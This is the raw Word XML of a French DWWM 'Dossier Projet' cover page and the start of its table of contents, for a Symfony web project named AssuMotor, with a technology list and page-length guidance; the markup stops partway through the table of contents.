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9031" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="54959712" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="09D15D57" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>DOSSIER PROJET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF6973D" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Titre Professionnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214E7AF" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Développeur Web et Web Mobile (DWWM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27090D53" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="17977528" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="04CC6A38" wp14:editId="26D81E94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1052830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-141605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3467100" cy="1762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467100" cy="1762125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21510099" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="3B90A016" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="365A2FCE" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="3CE8B413" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="46510642" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="2D69E526" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="5288AE1B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="608C30B3" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="7D353CA2" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="7E640B7C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="5F197EF8" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9026" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="80" w:type="dxa"/>
          <w:left w:w="120" w:type="dxa"/>
          <w:bottom w:w="80" w:type="dxa"/>
          <w:right w:w="120" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3159"/>
        <w:gridCol w:w="5867"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5F4C" w14:paraId="23DC914F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7028D1B9" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nom du projet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5867" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69029A0B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="00ED51A2">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>AssuMotor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="070039F2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="98"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5FBF3A18" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Candidat(e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5867" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4624A5FA" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="00ED51A2">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t xml:space="preserve">Mohand </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>Bir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="63114704" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2EBBAF63" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Date de la session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5867" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="714444D3" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="00ED51A2">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>15/07/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w:rsidRPr="00FB7EEC" w14:paraId="36B67478" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28DE41BE" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technologies utilisées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5867" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="718CCEF7" w14:textId="77777777" w:rsidR="00ED51A2" w:rsidRPr="00ED51A2" w:rsidRDefault="00ED51A2" w:rsidP="00ED51A2">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED51A2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>Langages : HTML, CSS, JavaScript, PHP, SQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41ECDBBB" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00ED51A2" w:rsidRDefault="00ED51A2">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Framework : Symfony, bootstrap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>Methodes : Http, AJAX,</w:t>
            </w:r>
            <w:r w:rsidR="000D2ACE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Twig, Doctrine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000D2ACE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Outils</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000D2ACE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: Git, Docker , Jira, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>VScode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000D2ACE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="109EE9C7" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00ED51A2" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7B2407" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00ED51A2" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E21E4E0" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Info à supprimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75565863" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C89C747" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Corpsdetexte"/>
      </w:pPr>
      <w:r>
        <w:t>Selon le référentiel d'évaluation (RE), le dossier projet doit faire :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEA545" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Corpsdetexte"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
        </w:rPr>
        <w:t>Corps du dossier : entre 30 et 50 pages maximum</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (schémas et illustrations compris, hors page de garde, sommaire et annexes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7306FD90" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Corpsdetexte"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
        </w:rPr>
        <w:t>Annexes : 30 pages maximum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A71AC" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Corpsdetexte"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Soit un total possible de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
        </w:rPr>
        <w:t>80 pages maximum</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>au grand maximum</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, mais en pratique un dossier bien construit se situe autour de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
        </w:rPr>
        <w:t>40 à 55 pages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (corps + annexes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5327D722" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="3A7512BC" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="385C98E7" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="5362B141" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="0C36F491" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="33510C02" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="47467E72" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766DAD75" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00C65F1A">
      <w:bookmarkStart w:id="0" w:name="_Toc233817719"/>
      <w:r>
        <w:t>TABLE DES MATIÈRES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="68A45DBC" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ACD56F" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817720" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1. LISTE DES COMPÉTENCES COUVERTES PAR LE PROJET</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817720 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7584B885" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817721" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bloc 1 – Développer la partie front-end d'une application web ou web mobile sécurisée</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817721 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FA7C52B" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817722" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bloc 2 – Développer la partie back-end d'une application web ou web mobile sécurisée</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817722 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6243F064" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817723" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Compétences transversales</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817723 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="636A0A36" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817724" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2. EXPRESSION DES BESOINS DU PROJET</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817724 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7616AA4E" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817725" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.1 Présentation générale du projet</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817725 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
